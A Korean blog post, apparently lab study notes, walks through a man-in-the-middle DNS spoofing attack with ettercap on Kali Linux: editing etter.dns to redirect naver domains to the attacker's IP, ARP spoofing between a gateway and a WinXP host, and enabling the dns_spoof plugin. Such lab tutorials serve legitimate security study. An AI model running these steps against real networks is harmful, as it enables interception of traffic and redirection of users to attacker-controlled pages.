728x90
반응형
MTM(Man in The Middle) attack
두 호스트 간에 통신을 하고 있을 때, 중간자가 사이에 끼어들어 통신 내용을 도청, 조작하는 공격
DNS Spoofing
### etter.dns 파일을 수정
root@kali:~# gedit /etc/ettercap/etter.dns
*.naver.* A 192.168.111.131 # 공격자의 IP 주소 (kali#2)
### ettercap 실행
root@kali:~# ettercap -G
### 스니핑할 NIC 지정 및 호스트 검색
Sniff > Unified sniffing > eth 0 ⇐ 스니핑할 NIC를 지정
Hosts > Scan for hosts ⇐ 해당 LAN에 존재하는 호스트를 검색
Hosts > Hosts list ⇐ 검색 결과를 확인
### 공격 대상을 지정
target1 => Gateway (192.168.111.2)
target2 => WinXP (192.168.111.140)
### ARP spoofing ⇒ 공격자를 공격 대상 사이에 위치 ⇒ WinXP <---> Kali#2 <---> Gateway
Mitm > ARP Spoofing > Sniff remote connections
### DNS Spoofing 공격
Plugins > Manage the plugins > dns_spoof > 선택(더블클릭) > 별표가 생기는 것을 확인
### DNS Spoofing 공격 성공 확인
WinXP에서 http://www.naver.com으로 접속을 시도 → Kali#2에서 제공하는 웹 페이지가 보이면 공격 성공
*** Kali#2에서 웹 서버가 실행되지 않은 경우 아래 명령어로 실행
# service apache2 start
728x90
반응형
'네트워크' 카테고리의 다른 글
scapy를 이용한 3-way handshaking (0) | 2019.06.07 |
---|---|
scapy (0) | 2019.06.07 |
ARP Spoofing (0) | 2019.06.07 |
Port Scanning (0) | 2019.06.07 |
TCP/IP (0) | 2019.05.22 |
댓글